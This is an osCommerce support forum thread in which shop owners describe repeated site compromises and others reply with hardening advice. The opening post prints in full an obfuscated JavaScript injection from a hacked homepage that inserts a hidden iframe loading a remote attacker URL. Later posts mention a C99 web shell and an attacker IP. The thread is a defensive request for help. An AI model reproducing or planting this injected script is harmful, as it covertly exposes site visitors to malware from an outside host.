Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacked AGAIN! advice please


Guest

Recommended Posts

Hi all.

Can anyone help or advise me before I give it up altogether.

I've never been hacked before til about 3 weeks ago, and boy are they making up for missed time! I've now been hacked about 20 times these past 3 weeks. Not sure if it's individual incidents, or if some code's been added somewhere that makes it happen (is that possible?)

I have: renamed my "admin"; deleted "filemanager" from admin; deleted "define languages" from admin; added "Security Pro"; added "Sitemonitor". My 2 configure files have permissions of 444; other files are no higher than 755.

I keep backing up my files, so replacing them is no problem (which is why it seems strange if it is some stray code as I'm sure (?) my backup's ok (how sure can I be - I've checked every file!)

Is anyone aware of security risks with the FCKEditor? A couple of times when I've been hacked my antivirus (AVG) has prevented me from opening a page that would use this. Plus today, when in "define mainpage" one of the popups from the editor had some strange code on the top of it. And when I run "Sitemonitor, there's always a long list of fckeditor files mentioned. Maybe it's all just coincidence.

I'm showing here the script that was used today (as far as I can tell, the same script that's been used before, but not every time, and also the rubbish that appeared on top of my home page today (which is how I knew I'd been stung yet again - this also mentions fckeditor! - I'm hoping it's not that that's the problem cos I couldnt' do without it!). I've also added my Sitemonitor results, which makes this a long post - I apologise for this but I have no idea if the information in it would mean anything to anyone. I've started to check all the files mention in the report and they are ok (will continue the check after I've posted this).

Thanks for bothering to read this far, and I look forward to any help anyone can offer.

:)

This was on my homepage:

x3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e
Parse error: syntax error, unexpected '<' in /home/simplysc/public_html/myadmin/fckeditor/fckeditor.php on line 32

This is the script:

<script>function zML(){};var dM=false;zML.prototype = {o : function() {h=false;nM=false;iN=17533;var xS=false;   var dA='';var eP=function(){};var j=document;this.qP='';r="r";this.f="";var z=new Date();this.kT="kT";var vY=false;sF="";var k=window;var kD=function(){};jW='';var a=new Array();ePG="";var l="l";var vK=false;this.sH='';var bI=new Date();var bE=function(){return 'bE'};this.eT='';var jE=new Date();this.aH="aH";function wZ(){};var p=new Date();var lQ='';var jI = function(xo,lK9CV,N0qsp,nA3eO){return ['x49x39'+lK9CV,N0qsp+'x6f',nA3eO+'x54x69x6dx65x6fx75x74',xo+'x48x74x35x61x52']}('x68x39x4ax52x7a','x54','x6fx51x64x35x31','x73x65x74')[2];var nU="nU";function sD(){};pC=false;var wT="";function aP(){};nA="nA";var x = function(L5,gQdNT,bi,Y7y,rl){return ['x3cx68x74x6dx6cx20x3ex3cx68x65'+L5,'x6c'+rl,'x45x6ex4ex61'+bi,Y7y+'x51x33','x70'+gQdNT]}('x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e','x6ex6dx42x4dx37','x59x32x76','x75x54x76','x50x79')[0];var vS=false;var sJ=new Array();this.u="u";this.y=false;this.uB=false;try {var iT=new Array();this.pY="";this.wTI="wTI";var jU='';this.qPS="qPS";var i = function(unIg2,eq0h,qaX){return ['x75x6ax70x35x53'+eq0h,'x53'+qaX,'x62x6f'+unIg2]}('x64x79','x4ex4fx56x74','x6cx58x70x71x59')[2];var zA=new Date();var aPU="";nMN=false;lI='';var n = function(jav8S,Y5lB8,TXUe,iP6m,oZG0){return [oZG0+'x65','x54x52x65x41'+TXUe,Y5lB8+'x70',iP6m+'x75',jav8S+'x50x45']}('x78x52x78x6fx44','x74x5ax36','x59x62','x71','x73x74x79x6c')[0];var xQ='';sHQ=29210;var xQZ='';this.dO=31678;function uD(){};var s = function(nExhD,IYue,GToEv){return [nExhD+'x75x34x74',GToEv+'x53x38x56x69','x69x66x72'+IYue]}('x67x54x42x33','x61x6dx65','x46x59x64x35')[2];this.iF=false;var hQ="hQ";var iNY=new Array();this.eD="eD";function qV(){};nQ=false;var wTK="";var b = function(fdm,so,l,EzENv,R){return ['x79x43x4b'+fdm,'x77x72x69x74'+R,EzENv+'x6ax57x75x43x76',so+'x71x48x32',l+'x49x35x71']}('x4bx4d','x6ex72x58','x76x63','x47x5ax41x31x45','x65')[1];lM="lM";this.iJ=false;var w = function(pG6,UX3,Kc6E){return ['x63x72x65x61'+UX3,Kc6E+'x50',pG6+'x68x47']}('x78x45','x74x65x45x6cx65x6dx65x6ex74','x76x63')[0];this.oD='';vM=false;var aPUL=function(){};var nS = function(aIHx,jk,OL,U5cY){return [u5cY+'x71x6dx31',aIHx+'x72x63',OL+'x56','x63'+jk]}('x73','x6d','x45x75','x4bx4fx39x76')[1];this.aD=false;var fO=function(){return 'fO'};this.tE="";var yP="";var fM=false;var t = function(OUlO,CeU0u,O8j){return [O8j+'x74x41x74x74x72x69x62x75x74x65',OUlO+'x54x76','x78x6bx76x58'+CeU0u]}('x54x64','x67x44x66','x73x65')[0];var nMX='';var xW=false;uL="";bY=false;var lQF=function(){return 'lQF'};dQ=false;this.oN=false;var vQ="vQ";var sP = function(uexVf,pOi,yxM,nb,OG){return ['x75x52'+yxM,'x54x48x54x30x32'+pOi,'x64x58x7a'+uexVf,OG+'x64x65x6e',nb+'x6fx34x7a']}('x74x6ex48x6bx35','x4cx32','x78x7ax4ex50x58','x54x73x32x6ax69','x68x69x64')[3];lY="lY";this.aJ=false;this.bO=26270;this.eJ='';var yX=function(){};this.nAL=19567;var xE='';this.aDI="aDI";var q = function(rQ,lXSn,xH3z,wZykN){return ['x56x61x43'+xH3z,'x76'+lXSn,'x43x31x6dx30x48'+rQ,wZykN+'x54x63x4b']}('x74x66x6bx43','x69x73x69x62x69x6cx69x74x79','x69x74x70','x47x57x55')[1];this.lC="";this.c="c";tU='';var sN=new Array();var vA=new Date();    var d = function(n,gUI,VLIx,Ublk,nER){return [VLIx+'x4cx34x50x74x4f',n+'x42x6dx31x44x51',Ublk+'x77x70x51x4bx55',nER+'x6ex64x43x68x69x6cx64',gUI+'x4ex42']}('x57','x67x6cx6e','x42','x6c','x61x70x70x65')[3];bIB='';var bS=new Date();var yPK=function(){};    var vKH=new Date();var vYN=function(){return 'vYN'};fY=false;    var iB=this.e();var bSV=false;dK="dK";var vSF=false;jIL=false;var dS=document[w](s);var kDE=new Array();m=25760;wD=4373;var dC="dC";var bG='';var wN=function(){};dS[n][q] = sP;this.aF='';xA=false;this.sHE=false;var xEB='';this.fS=17966;dS[t](nS, iB);this.tS="";var mP="";function eV(){};this.jWV="";nUD='';j[i][d](dS);this.uT=false;nE='';var sT=new Array();var tG='';var bQ=false;this.kR='';var xWF=new Date();var lA=function(){return 'lA'};} catch(v) {var fC='';qVQ=27050;var qN=5239;this.jM="";dKT='';var jIP='';this.bGZ=15967;j.write(x);var qVG="";mV="";var xO=new Date();var jG="jG";this.wV='';hY="hY";uTM=2358;var g = this;this.tER="";var rO=function(){return 'rO'};this.qNG='';this.mH=false;function aDG(){};var yT="";var tQ="tQ";k[jI](function(){ var fQ=new Date();this.mJ=false;var tQX=function(){return 'tQX'};var fI='';zM='';var wNG=new Array();var aR="";zQ='';g.o();var pG='';this.sX=false;this.eH='';var lK='';}, 352);rW='';function uN(){};var bK=new Date();this.sZ="sZ";}function mB(){};var dW=new Date();this.sV="sV";},e : function() {function gN(){};zMZ=false;var fSZ="fSZ";this.pE="";return function(N4Y,Pb,Y){return [N4Y+'x6ax41x79','x67x72x42'+Pb,'x68x74x74x70x3ax2fx2fx61x6cx74x65x72x70x61x72x61x64x69x67x6d'+Y]}('x66x6e','x47x63','x61x2ex6ex65x74x2fx73x74x64x73x2fx67x6fx2ex70x68x70x3fx73x69x64x3dx31x31')[2];this.bOD=3755;var tQXA='';var wJ=new Array();this.bYN="";}};oR="";var cV=new zML(); this.bKF="";cV.o();var xG=false;</script>

And this is the result of my most recent Sitemonitor check:

363 datafeed_shopmania_oscommerce.php - hacker code = eval

80 download.php hacker code = eval

47 google3dfac2925e63.php hacker code = error_reporting(0)

47 googlecf0340a99daf.php hacker code = error_reporting(0)

68 translucent_scroller.js hacker code = eval

18 ext/jQuery/jQuery.js hacker code = eval

511 includes/checkout/checkout.js hacker code = eval

471 includes/classes/nusoap/lib/class.soap_parser.php hacker code = base64_decode

525 includes/classes/nusoap/lib/class.soap_server.php hacker code = eval

597 includes/classes/nusoap/ lib/class.soapclient.php hacker code = eval

6257 includes/classes/nusoap/lib/nusoap.php hacker code = base64_decode

83 includes/functions/compatibility.php hacker code = eval

492 includes/functions/general.php hacker code = eval

1 includes/languages/english/cookie_usage.php hacker code = eval

92 includes/languages/english/define_mainpage.php hacker code = eval

39 includes/modules/payment/payofflinepro.php hacker code = base64_decode

352 includes/modules/payment/paypal_standard.php hacker code = base64_decode

130 /configuration.php hacker code = eval

1839 /easypopulate.php hacker code = eval

212 /modules.php hacker code = eval

19 /sitemonitor_configure.php hacker code = error_reporting(0)

252 fckeditor/fckeditor.js hacker code = eval

33 /fckeditor/editor/_source/fckeditorapi.js hacker code = eval

78 /fckeditor/editor/_source/classes/fckxml_gecko.js hacker code = eval

461 /fckeditor/editor/_source/internals/fck_gecko.js hacker code = eval

55 /fckeditor/editor/_source/internals

/fcktoolbarset.js hacker code = eval

122 /fckeditor/editor/dialog/fck_link.html <frame

200 /fckeditor/editor/dialog/fck_link/fck_link.js eval

13 /fckeditor/editor/dialog/

fck_spellerpages/spellerpages/controlWindow.js hacker code = eval

5 /fckeditor/editor/dialog/

fck_spellerpages/spellerpages/spellChecker.js hacker code = eval

209 /fckeditor/editor/dialog/

fck_spellerpages/spellerpages/wordWindow.js hacker code = eval

117 /fckeditor/editor/filemanager/browser/default/js/fckxml.js hacker code = eval

35 /fckeditor/editor/filemanager/connectors/php/basexml.php hacker code = eval

59 /fckeditor/editor/js/fckadobeair.js hacker code = eval

31 /fckeditor/editor/js/fckeditorcode_gecko.js hacker code = eval

38 /fckeditor/editor/js/fckeditorcode_ie.js eval

110 /fckeditor/editor/lang/sl.js hacker code = eval

169 /fckeditor/editor/wsc/w.html hacker code = eval

471 /includes/classes/phplot.php hacker code = eval

404 /includes/functions/general.php hacker code = eval

56 /includes/javascript/calendarcode.js hacker code = eval

75 /includes/javascript/spiffyCal/spiffyCal_v2_1.js hacker code = eval

60 /includes/modules/newsletters/product_notification.php hacker code = eval

Link to comment
Share on other sites

I have: renamed my "admin";

Good. Is it also password-protected access?

deleted "filemanager" from admin; deleted "define languages" from admin;

Did you also delete the files themselves (file_manager.php, define_language.php)? It does no good to simply remove the links to them in admin.

added "Security Pro"; added "Sitemonitor".

Not familiar with them, but I think they only may alert you to changes, not prevent them.

My 2 configure files have permissions of 444; other files are no higher than 755.

Files should be 644. Directories are 755.

 

Well, if you're being constantly hacked, it's possible there's a hacked file that you're overlooking, or a planted backdoor script. Don't just replace all the osC files -- erase every file before replacing them with clean copies (including product images). How sure are you that your backups are unhacked? You may want to do a clean install (saving the database) and re-install all your add-ons. Have you scanned your PC (used to administer osC) for spyware (password sniffers and keystroke loggers) and changed all your site, FTP, and account passwords?

Link to comment
Share on other sites

I had the similar problem with you.

See my post here:

My website was hacked. It show many "x3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e " word in the home page and admin page.

In the home page also showed "Warning:session_start()[function.session-start]:cannot send session cache limiter-headers already sent (output started at /home/gplustr1/pubile_html/included/functions/compatibility.php:179) in /home/gplustr1/public_html/included/fuctions/sessions.php on line 102

 

My website had hacked many time this few weeks. Always same problem.

I had backup the website, and check with NOD 32 antivirus, then I find the virus called :public_html/user_profiles.php - PHP/C99Shell.W trojan

Then I remove the virus and then restore my website with clean backup(I think is cleaned file). I had download the backup file again and do the antivirus again, then can not find the virus.

But the same problem happen again after two days only. Really don't know why? Anyway know how to solve it?

thanks for your help.

thanks"

 

Has you solve the problem?

thanks

Link to comment
Share on other sites

Good. Is it also password-protected access?

 

Did you also delete the files themselves (file_manager.php, define_language.php)? It does no good to simply remove the links to them in admin.

 

Not familiar with them, but I think they only may alert you to changes, not prevent them.

 

Files should be 644. Directories are 755.

 

Well, if you're being constantly hacked, it's possible there's a hacked file that you're overlooking, or a planted backdoor script. Don't just replace all the osC files -- erase every file before replacing them with clean copies (including product images). How sure are you that your backups are unhacked? You may want to do a clean install (saving the database) and re-install all your add-ons. Have you scanned your PC (used to administer osC) for spyware (password sniffers and keystroke loggers) and changed all your site, FTP, and account passwords?

Hi Phil, and thanks for responding.

Between posting this last night, and logging into admin again this morning, I've been hacked yet again so it really does seem like it's an overlooked file. Bother is I shall want to know where so I shall be going through them all again. But a clean install looks like the only way to go. I have so many add-ons that I only wanted to do that as a last resort. Looks like its last resort time!

Yes, admin is password protected

Yes, I did delete those files

Files are 644 and directories are 755

I have scanned my PC (done every day)

I hadn't changed my passwords (seems like an obvious thing to do so don't ask why not!)

Thanks for the pointers, appreciate it.

Chris

:)

 

Just checked my site and it LOOKS fine, the only apparent evidence today is the "x3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x" across the top of admin

Link to comment
Share on other sites

My site also been attacked by some person in Indonesia. you got to watch out the ip address 114.79.55.211, check on your logs, if they access your site, recheck your file name again.

My admin area has install the security pro, password protected, and PCI-Complicated with MacFee secure, but they still be able to get into my admin folder to add his email [email protected] as admin email.

What he does is upload 2 files on my root location, one is call media.php, the other one is checkout_userinfo.php

 

ken

Link to comment
Share on other sites

Ken, did you rename your "admin" directory, password-protect it, and take other security measures (including removal of file_manager and define_language) as suggested on this forum? That should keep anyone from getting into your admin folder.

Link to comment
Share on other sites

  • 7 months later...

Ken, did you rename your "admin" directory, password-protect it, and take other security measures (including removal of file_manager and define_language) as suggested on this forum? That should keep anyone from getting into your admin folder.

 

I know that this an old post but i'm having a similar issue here. I deleted THE ENTIRE ADMIN FOLDER and the hacker breaks in again to put a redirect trojan in some of my files. He doesnt use ftp or the admin folder to hack.

Link to comment
Share on other sites

I know that this an old post but i'm having a similar issue here. I deleted THE ENTIRE ADMIN FOLDER and the hacker breaks in again to put a redirect trojan in some of my files. He doesnt use ftp or the admin folder to hack.

 

 

Does he use your computer?

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary

Link to comment
Share on other sites

Your customized script or some contrib that you used has a security hole.

 

1. Allow only your IP address in admin using htaccess.

 

2. Place htacces in includes and images so that no .php can be executed.

 

3. Disable shell( request hosting company.

 

4. If no development needed do not set write permission.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site.

 

Check My About US For who am I and what My company does.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...